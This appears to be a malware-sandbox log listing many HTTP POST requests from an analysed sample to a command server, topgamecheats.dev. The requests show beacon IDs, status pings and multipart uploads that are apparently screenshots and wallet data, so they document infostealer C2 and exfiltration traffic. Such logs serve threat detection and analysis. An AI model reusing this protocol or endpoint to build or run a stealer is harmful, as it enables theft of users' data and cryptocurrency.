Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0Mw==Host: topgamecheats.devContent-Length: 6303Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwMTY3Host: topgamecheats.devContent-Length: 100319Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTgyNDQ=Host: topgamecheats.devContent-Length: 98396Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
